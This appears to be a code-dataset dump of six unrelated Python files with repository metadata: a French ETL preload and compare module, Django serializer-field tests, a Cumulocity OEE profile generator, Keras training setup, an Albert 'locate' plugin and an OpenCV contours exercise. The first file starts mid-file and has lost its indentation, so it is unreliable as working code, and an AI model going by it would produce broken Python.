vrep = lambda x: regle.resub.sub(regle.repl, x)
chaine_comm = vrep(regle.params.cmp1.val)
regle.setvar('nocomp', False)
process = psutil.Process(os.getpid())
mem1 = process.memory_info()[0]
if obj and regle.params.att_entree.val:
entree = obj.attributs.get(regle.params.att_entree.val, regle.fich)
else:
entree = regle.entree if regle.entree else valreplace(regle.fich, obj)
print('------- preload commandes:(', chaine_comm, ') f:', entree,
'clef', regle.params.att_sortie.val)
if chaine_comm: # on precharge via une macro
nomdest = regle.params.cmp2.val if regle.params.cmp2.val.startswith('#') \
else '#'+ regle.params.cmp2.val
processor = regle.stock_param.getpyetl(chaine_comm, entree=entree, rep_sortie=nomdest)
processor.process()
renseigne_attributs_batch(regle, obj, processor.retour)
print('------- preload ', processor.store)
regle.stock_param.store.update(processor.store) # on rappatrie les dictionnaires de stockage
regle.setvar('storekey', processor.retour) # on stocke la clef
else:
# racine = regle.stock_param.racine
chemin = os.path.dirname(entree)
fichier = os.path.basename(entree)
ext = os.path.splitext(fichier)[1]
lecteur = regle.stock_param.reader(ext)
regle.reglestore.tmpstore = dict()
nb_total = 0
try:
nb_total = lecteur.lire_objets('', chemin, fichier, regle.stock_param,
regle.reglestore)
regle.stock_param.store[regle.params.cmp2.val] = regle.reglestore.tmpstore
except FileNotFoundError:
regle.stock_param.store[regle.params.cmp2.val] = None
print('fichier inconnu', os.path.join(chemin, fichier))
mem2 = process.memory_info()[0]
mem = mem2-mem1
print('------- preload ', nb_total, mem, '--------', int(mem/(nb_total+1)))
def h_preload(regle):
'''prechargement'''
obj = None
mapper = regle.stock_param
reglestore = mapper.interpreteur(";;;;;;"+regle.params.att_sortie.val+
";tmpstore;cmp;"+regle.params.cmp2.val, "", 99999)
regle.reglestore = reglestore
regle.repl = lambda x: obj.attributs.get(x.group(1), '')
regle.resub = re.compile(r'\[(#?[a-zA-Z_][a-zA-Z0-9_]*)\]')
fich = regle.params.val_entree.val
# fich = fich.replace('[R]', regle.stock_param.racine)
regle.fich = fich
regle.dynlevel = 0
if '[R]' in fich:
regle.dynlevel = 1
if "[F]" in fich:
regle.dynlevel = 2
elif "[G]" in fich:
regle.dynlevel = 1
elif "[" in fich:
regle.dynlevel = 3
regle.entree = None
if regle.dynlevel == 0: # pas de selecteur on precharge avant de lire
regle.entree = regle.params.val_entree.val
regle.fich = regle.entree
preload(regle, None)
regle.valide = "done"
print('==================h_preload===', regle.dynlevel, regle.valide)
def f_preload(regle, obj):
'''#aide||precharge un fichier en appliquant une macro
#aide_spec||parametres clef;fichier;attribut;preload;macro;nom
#aide_spec1||les elements entre [] sont pris dans l objet courant
#aide_spec2||sont reconnus[G] pour #groupe et [F] pour #classe pour le nom de fichier
#pattern||A;?C;?A;preload;?C;C
#!test||
'''
fich = regle.fich
if regle.dynlevel > 0:
fich = fich.replace('[G]', obj.attributs['#groupe'])
fich = fich.replace('[R]', regle.stock_param.racine)
fich = fich.replace('[F]', obj.attributs['#classe'])
if fich != regle.entree:
regle.entree = fich
print('==================f_preload===', regle.stock_param.racine, regle.entree)
preload(regle, obj)
# print ('chargement ',regle.params.cmp2.val,
# regle.stock_param.store[regle.params.cmp2.val])
return True
def compare_traite_stock(regle):
""" sort les objets detruits"""
for obj in regle.comp.values():
obj.attributs[regle.params.att_sortie.val] = 'supp'
obj.setident(regle.precedent)
regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["supp:"])
regle.comp = None
regle.nbstock = 0
#def compare_traite_stock(regle):
# """ sort les objets detruits"""
# for clef, obj in regle.comp.items():
# if obj.redirect is None:
# obj.attributs[regle.params.att_sortie.val]='supp'
# regle.stock_param.moteur.traite_objet(obj, regle.branchements.brch["supp:"])
# regle.comp[clef] = None
# regle.comp = None
# regle.nbstock = 0
def h_compare(regle):
"""comparaison a une reference"""
regle.branchements.addsortie('new:')
regle.branchements.addsortie('supp:')
regle.branchements.addsortie('diff:')
regle.branchements.addsortie('orig:')
# regle.taites = set()
regle.store = True
regle.nbstock = 0
regle.comp = None
regle.precedent = None
regle.traite_stock = compare_traite_stock
def f_compare2(regle, obj):
'''#aide||compare a un element precharge
#aide_spec||parametres clef;fichier;attribut;preload;macro;nom
#aide_spec2||sort en si si egal en sinon si different
#aide_spec3||si les elements entre [] sont pris dans l objet courant
#pattern||A;;?L;compare2;A;C
#helper||compare
#schema||ajout_attribut
#!test||
'''
if regle.precedent != obj.ident:
comp = regle.stock_param.store[regle.params.cmp2.val]
if regle.comp and comp is not regle.comp:
compare_traite_stock(regle)
regle.nbstock = 1
regle.comp = comp
if regle.comp:
if regle.params.att_entree.liste:
regle.comp2 = {i:([i.attributs[j] for j in
regle.params.att_entree.liste]) for i in regle.comp}
else:
regle.comp2 = {i:([i.attributs[j] for j in
sorted([k for k in i.attributs if k[0] != "#"])])
for i in regle.comp}
# print ('comparaison ', len(regle.comp), regle.comp)
try:
if len(regle.params.cmp1.liste) > 1:
clef = "|".join(obj.attributs.get(i, '') for i in regle.params.att_entree.liste)
else:
clef = obj.attributs[regle.params.cmp1.val]
ref = regle.comp2[clef]
regle.ref.add(clef)
except KeyError:
obj.redirect = "new:"
obj.attributs[regle.params.att_sortie.val] = 'new'
return False
if regle.params.att_entree.liste:
compare = all([obj.attributs[i] == ref.attributs[i]
for i in regle.params.att_entree.liste])
else:
atts = {i for i in obj.attributs if i[0] != "#"}
kref = {i for i in ref.attributs if i[0] != "#"}
# id_att = atts == kref
compare = atts == kref and all([obj.attributs[i] == ref.attributs[i]
for i in atts]) and obj.geom == ref.geom
if compare:
return True
obj.redirect = "diff:"
obj.attributs[regle.params.att_sortie.val] = 'diff'
ref.attributs[regle.params.att_sortie.val] = 'orig'
regle.stock_param.moteur.traite_objet(ref, regle.branchements.brch["orig:"])
# on remet l'original dans le circuit
return False
def f_compare(regle, obj):
'''#aide||compare a un element precharge
#aide_spec||parametres clef;fichier;attribut;preload;macro;nom
#aide_spec2||sort en si si egal en sinon si different
#aide_spec3||si les elements entre [] sont pris dans l objet courant
#pattern||A;;?L;compare;A;C
#schema||ajout_attribut
#!test||
'''
if regle.precedent != obj.ident: # on vient de changer de classe
if regle.comp:
compare_traite_stock(regle)
regle.nbstock = 1
regle.comp = regle.stock_param.store[regle.params.cmp2.val]
regle.precedent = obj.ident
# print ('comparaison ', len(regle.comp), regle.comp)
if regle.comp is None:
return False
try:
if len(regle.params.cmp1.liste) > 1:
clef = "|".join(obj.attributs.get(i, '')
for i in regle.params.att_entree.liste)
else:
clef = obj.attributs[regle.params.cmp1.val]
ref = regle.comp.pop(clef)
except KeyError:
obj.redirect = "new:"
obj.attributs[regle.params.att_sortie.val] = 'new'
return False
if regle.params.att_entree.liste:
compare = all([obj.attributs[i] == ref.attributs[i]
for i in regle.params.att_entree.liste])
else:
atts = {i for i in obj.attributs if i[0] != "#"}
kref = {i for i in ref.attributs if i[0] != "#"}
# id_att = atts == kref
compare = atts == kref and all([obj.attributs[i] == ref.attributs[i]
for i in atts]) and obj.geom == ref.geom
if compare:
return True
obj.redirect = "diff:"
obj.attributs[regle.params.att_sortie.val] = 'diff'
ref.attributs[regle.params.att_sortie.val] = 'orig'
ref.setident(obj.ident) # on force l'identite de l'original
regle.stock_param.moteur.traite_objet(ref, regle.branchements.brch["orig:"])
# on remet l'original dans le circuit
return False
def f_run(regle, obj):
'''#aide||execute un programme exterieur
#aide_spec||attribut qui recupere le resultat, parametres , run , nom, parametres
#pattern||?A;?C;?A;run;C;?C
#schema||ajout_attribut
'''
chaine = ' '.join((regle.params.cmp1.val, regle.params.cmp2.val,
obj.attributs.get(regle.params.att_entree.val, regle.params.val_entree.val)))
fini = subprocess.run(chaine, stderr=subprocess.STDOUT)
if regle.params.att_sortie.val:
obj.attributs[regle.params.att_sortie.val] = str(fini)
| klix2/mapper0_8 | pyetl/moteur/fonctions/traitement_divers.py | traitement_divers.py | py | 26,649 | python | fr | code | 0 | github-code | 36 |
35658691918 | """The filtersets tests module."""
import pytest
from django.db.models.query import QuerySet
from django.http import HttpRequest
from communication.serializer_fields import (ParentMessageForeignKey,
UserReviewForeignKey)
from conftest import OBJECTS_TO_CREATE
pytestmark = pytest.mark.django_db
def test_user_review_foreign_key(reviews: QuerySet):
"""Should return the filtered list of reviews by a user."""
obj = UserReviewForeignKey()
request = HttpRequest()
user = reviews[0].professional.user
request.user = user
obj._context = {"request": request} # pylint: disable=protected-access
result = obj.get_queryset()
assert reviews.count() == 2
assert result.count() == 1
assert result.first().professional.user == user
def test_parent_message_foreign_key(messages: QuerySet):
"""Should return the filtered list of messages by a user."""
obj = ParentMessageForeignKey()
request = HttpRequest()
user = messages[0].sender
request.user = user
obj._context = {"request": request} # pylint: disable=protected-access
result = obj.get_queryset()
assert messages.count() == OBJECTS_TO_CREATE * 4
assert result.count() == OBJECTS_TO_CREATE
assert result.first().recipient == user
| webmalc/d8base-backend | communication/tests/serializer_fields_tests.py | serializer_fields_tests.py | py | 1,305 | python | en | code | 0 | github-code | 36 |
3314005552 | import time, json, os, logging, requests
from cumulocityAPI import C8Y_BASEURL, C8Y_TENANT, C8Y_HEADERS, CumulocityAPI
from arguments_handler import get_profile_generator_mode
from oeeAPI import OeeAPI
def try_int(value):
try:
return int(value)
except:
return None
PROFILES_PER_DEVICE = try_int(os.environ.get('PROFILES_PER_DEVICE')) or 1
SLEEP_TIME_FOR_PROFILE_CREATION_LOOP = try_int(os.environ.get('SLEEP_TIME_FOR_PROFILE_CREATION_LOOP')) or 60 * 12
MODE = get_profile_generator_mode()
# JSON-PYTHON mapping, to get json.load() working
null = None
false = False
true = True
######################
logging.basicConfig(format='%(asctime)s %(name)s:%(message)s', level=logging.INFO)
log = logging.getLogger("profile-generator")
log.info("using C8Y backend:" + C8Y_BASEURL)
log.info("using C8Y tenant:" + C8Y_TENANT)
c8y_api = CumulocityAPI()
oee_api = OeeAPI()
def delete_profiles():
simulator_ids = oee_api.get_simulator_ids()
deleted_profiles = 0
for simulator_id in simulator_ids:
log.info(f'deleting profiles for {simulator_id}')
response = requests.get(f'{C8Y_BASEURL}/inventory/managedObjects/{simulator_id}', headers=C8Y_HEADERS)
if response.ok:
child_devices = response.json()['childDevices']['references']
for child_device in child_devices:
child_device_id = child_device['managedObject']['id']
child_device_json = c8y_api.get_managed_object(child_device_id)
if child_device_json['type'] == c8y_api.OEE_CALCULATION_PROFILE_TYPE:
log.info(f'deleting managed object {child_device_id}')
deleted_profiles = deleted_profiles + c8y_api.delete_managed_object(child_device_id)
else:
log.warning(f'Couldn\'t find the managed object. response: {response}, content: {response.text}')
log.info(f'profiles deleted: {deleted_profiles}')
if MODE == 'createProfiles':
log.info('===============================')
log.info('starting to create profiles ...')
log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
counter = 0
for _ in range(PROFILES_PER_DEVICE):
for external_id in oee_api.get_simulator_external_ids():
profile = oee_api.create_and_activate_profile(external_id)
counter = counter + 1
if counter % 200 == 0:
log.info(f'profiles: {c8y_api.count_all_profiles()}. Wait for {SLEEP_TIME_FOR_PROFILE_CREATION_LOOP} minutes')
# sleep for some time to be able to verify if calculation is still working with the given number of profiles
time.sleep(SLEEP_TIME_FOR_PROFILE_CREATION_LOOP)
log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'removeSimulatorProfilesViaOee':
log.info('===============================================')
log.info('starting to remove all simulator profiles via OEE API ...')
log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
oee_api.delete_all_simulators_profiles()
log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'deleteSimulatorProfiles':
log.info('===================================')
log.info('starting to delete all simulator profiles ...')
log.info(f'existing profiles: {c8y_api.count_all_profiles()}')
delete_profiles()
log.info(f'profiles after execution: {c8y_api.count_all_profiles()}')
if MODE == 'deleteCalculationCategories':
log.info('===================================')
log.info('starting to delete all calculation categories ...')
log.info(
f'existing category managed objects: {c8y_api.count_all_categories()}')
deleted_categories = 0
for category in c8y_api.get_calculation_categories():
deleted_categories += c8y_api.delete_managed_object(category['id'])
log.info(f'Managed_objects deleted: {deleted_categories}')
if MODE == 'createCalculationCategories':
log.info('===================================')
log.info('starting to create calculation categories ...')
with open('./categories.json', 'r') as f:
categories = f.read()
if (c8y_api.count_all_categories()) == 0:
log.info('Create category managed object')
c8y_api.create_managed_object(categories)
elif (c8y_api.count_all_categories()) == 1:
log.info('Update category managed object')
categories_by_id = {}
for c in json.loads(categories)['categories'] + c8y_api.get_calculation_categories()[0]['categories']:
categories_by_id[c['id']] = c
mo_id = c8y_api.get_calculation_categories()[0]['id']
fragment = {
'categories': list(categories_by_id.values())
}
c8y_api.update_managed_object(mo_id, json.dumps(fragment))
else:
log.warning('More than 1 category managed object! Unable to update managed object')
log.info('==========Categories created==========')
| SoftwareAG/oee-simulators | simulators/main/profile_generator.py | profile_generator.py | py | 5,006 | python | en | code | 8 | github-code | 36 |
42356364206 | import os
import tensorflow as tf
from tensorflow.keras.callbacks import EarlyStopping
from utils.callbacks import ModelCheckpoint, TimeHistory
from engine.metrics import (jaccard_index, jaccard_index_softmax, IoU_instances,
instance_segmentation_loss, weighted_bce_dice_loss)
def prepare_optimizer(cfg, model):
"""Select the optimizer, loss and metrics for the given model.
Parameters
----------
cfg : YACS CN object
Configuration.
model : Keras model
Model to be compiled with the selected options.
"""
assert cfg.TRAIN.OPTIMIZER in ['SGD', 'ADAM']
assert cfg.LOSS.TYPE in ['CE', 'W_CE_DICE']
# Select the optimizer
if cfg.TRAIN.OPTIMIZER == "SGD":
opt = tf.keras.optimizers.SGD(lr=cfg.TRAIN.LR, momentum=0.99, decay=0.0, nesterov=False)
elif cfg.TRAIN.OPTIMIZER == "ADAM":
opt = tf.keras.optimizers.Adam(lr=cfg.TRAIN.LR, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
# Compile the model
if cfg.PROBLEM.TYPE == "CLASSIFICATION":
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=["accuracy"])
elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
if cfg.MODEL.N_CLASSES > 1:
model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=[jaccard_index_softmax])
else:
model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
elif cfg.LOSS.TYPE == "CE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
if cfg.MODEL.N_CLASSES > 1:
raise ValueError("Not implemented pipeline option: N_CLASSES > 1 and INSTANCE_SEG")
else:
if cfg.DATA.CHANNELS in ["BC", "BCM"]:
model.compile(optimizer=opt, loss='binary_crossentropy', metrics=[jaccard_index])
else:
if cfg.DATA.CHANNELS == "Dv2":
model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
metrics=["mse"])
else:
bin_channels = 2 if cfg.DATA.CHANNELS in ["BCD", "BCDv2"] else 1
model.compile(optimizer=opt, loss=instance_segmentation_loss(cfg.DATA.CHANNEL_WEIGHTS, cfg.DATA.CHANNELS),
metrics=[IoU_instances(binary_channels=bin_channels)])
elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "SEMANTIC_SEG":
model.compile(optimizer=opt, loss=weighted_bce_dice_loss(w_dice=0.66, w_bce=0.33), metrics=[jaccard_index])
elif cfg.LOSS.TYPE == "W_CE_DICE" and cfg.PROBLEM.TYPE == "INSTANCE_SEG":
raise ValueError("Not implemented pipeline option: LOSS.TYPE == W_CE_DICE and INSTANCE_SEG")
def build_callbacks(cfg):
"""Create training and validation generators.
Parameters
----------
cfg : YACS CN object
Configuration.
Returns
-------
callbacks : List of callbacks
All callbacks to be applied to a model.
"""
callbacks = []
# To measure the time
time_callback = TimeHistory()
callbacks.append(time_callback)
# Stop early and restore the best model weights when finished the training
earlystopper = EarlyStopping(patience=cfg.TRAIN.PATIENCE, verbose=1, restore_best_weights=True)
callbacks.append(earlystopper)
# Save the best model into a h5 file in case one need again the weights learned
os.makedirs(cfg.PATHS.CHECKPOINT, exist_ok=True)
checkpointer = ModelCheckpoint(cfg.PATHS.CHECKPOINT_FILE, verbose=1, save_best_only=True)
callbacks.append(checkpointer)
return callbacks
| lijunRNA/EM_Image_Segmentation | engine/__init__.py | __init__.py | py | 3,725 | python | en | code | null | github-code | 36 |
5986988615 | from albert import *
import os
import pathlib
import shlex
import subprocess
md_iid = '1.0'
md_version = "1.8"
md_name = "Locate"
md_description = "Find and open files using locate"
md_license = "BSD-3"
md_url = "https://github.com/albertlauncher/python/tree/master/locate"
md_bin_dependencies = "locate"
class Plugin(TriggerQueryHandler):
def id(self):
return md_id
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "'"
def synopsis(self):
return "<locate params>"
def initialize(self):
self.icons = [
"xdg:preferences-system-search",
"xdg:system-search",
"xdg:search",
"xdg:text-x-generic",
str(pathlib.Path(__file__).parent / "locate.svg")
]
def handleTriggerQuery(self, query):
if len(query.string) > 2:
try:
args = shlex.split(query.string)
except ValueError:
return
result = subprocess.run(['locate', *args], stdout=subprocess.PIPE, text=True)
if not query.isValid:
return
lines = sorted(result.stdout.splitlines(), reverse=True)
if not query.isValid:
return
for path in lines:
basename = os.path.basename(path)
query.add(
Item(
id=path,
text=basename,
subtext=path,
icon=self.icons,
actions=[
Action("open", "Open", lambda p=path: openUrl("file://%s" % p))
]
)
)
else:
query.add(
Item(
id="updatedb",
text="Update locate database",
subtext="Type at least three chars for a search",
icon=self.icons,
actions=[
Action("update", "Update", lambda: runTerminal("sudo updatedb"))
]
)
)
| m0lw9re/albert | plugins/python/plugins/locate/__init__.py | __init__.py | py | 2,227 | python | en | code | 0 | github-code | 36 |
23400353850 | import cv2
import numpy as np
from matplotlib import pyplot as plt
import os
os.chdir('C:\\Users\\sachi\\.vscode\\GitHubRepos\\OSCV_Exercises')
exetasknum = 1
# Contours can be explained simply as a curve joining all the continuous points (along the boundary), having same color or intensity. The contours are a useful tool for shape analysis and object detection and recognition.
# For better accuracy, use binary images. So before finding contours, apply threshold or canny edge detection.
# findContours function modifies the source image. So if you want source image even after finding contours, already store it to some other variables.
# In OpenCV, finding contours is like finding white object from black background. So remember, object to be found should be white and background should be black.
if exetasknum==1:
im = cv2.imread('test.jpg')
imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
ret,thresh = cv2.threshold(imgray,127,255,0)
contours,hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
major = cv2.__version__.split('.')[0]
if major == '3':
ret, contours, hierarchy = cv2.findContours(im.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #im.copy()->thresh
else:
contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
img = cv2.drawContours(im, contours, -1, (0,255,0), 3)
while True:
cv2.imshow('img', img)
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
# img = cv2.drawContours(img, contours, -1, (0,255,0), 3)
# while True:
# cv2.imshow('All Contours', img)
# k = cv2.waitKey(1) & 0xFF
# if k == 27:
# break
# img = cv2.drawContours(img, contours, 0, (0,255,0), 3)
# while True:
# cv2.imshow('1st Contour', img)
# k = cv2.waitKey(1) & 0xFF
# if k == 27:
# break | sachingadgil/OSCV_Exercises | OpenCV_Python_Tutorials/017 Contours Getting Started.py | 017 Contours Getting Started.py | py | 1,930 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.